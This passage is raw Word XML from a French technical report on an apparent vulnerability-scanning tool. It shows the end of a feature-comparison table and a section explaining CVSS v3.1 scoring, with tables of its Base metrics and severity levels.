            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="10B75C06" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589FED6D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python natif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A64490A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4452C153" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35CF6BF0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="716CA768" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="705F3D16" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="67A902A6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6551FC5D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Léger (&lt;50 Mo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="154B5FBE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="07A4BB57" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="55B3BEBD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6BA93319" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="551A2923" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59D77976" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="3A5B97EF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="1" w:color="003366"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.6  Standards de Scoring : CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E06D29" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le Common Vulnerability Scoring System (CVSS) est un standard industriel ouvert pour évaluer la sévérité des vulnérabilités de sécurité. Développé par le FIRST (Forum of Incident Response and Security Teams), CVSS v3.1 est la version actuelle, adoptée par le NVD (National Vulnerability Database), les principaux éditeurs de sécurité et les réglementations sectorielles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8A6B8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le score CVSS v3.1 est calculé à partir de métriques regroupées en trois groupes : le groupe Base (intrinsèque à la vulnérabilité), le groupe Temporel (évolution dans le temps) et le groupe Environnemental (spécifique au contexte d'utilisation). Notre outil utilise les scores Base pour scorer chaque vulnérabilité détectée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB0BF1B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Métriques CVSS v3.1 — Groupe Base</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1699"/>
        <w:gridCol w:w="3113"/>
        <w:gridCol w:w="4526"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="562AC36A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DA0359E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Groupe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7635BAD3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Métrique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="064D14FC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Valeurs possibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="0494A1ED" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4197985E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FBD2656" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vecteur d'attaque (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4674A96D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Network (N), Adjacent (A), Local (L), Physical (P)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1471FC8F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5514C714" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="19263D22" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Complexité (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6B040649" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7C4E4269" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F2ABEC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FBA82DB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Privilèges requis (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713AEACA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="144F17FF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6156C03C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5819B502" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Interaction utilisateur (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6D41E730" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>None (N), Required (R)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="3848D3EA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39585958" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D68584B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Portée (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="770FE81F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Unchanged (U), Changed (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="3022CD81" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5CF68C27" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="796B8D54" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Confidentialité (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2E19D590" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7CA59C6B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42329FAF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B24E3E7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Intégrité (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4147DAE7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="384E1445" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="786EA02A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="47036FA8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disponibilité (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="69DF585F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>None (N), Low (L), High (H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="266C7A27" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="2A96F0E7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tableau — Niveaux de sévérité CVSS v3.1 et délais de remédiation recommandés</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="2551"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="2C2B315E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BA49360" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sévérité</w:t>
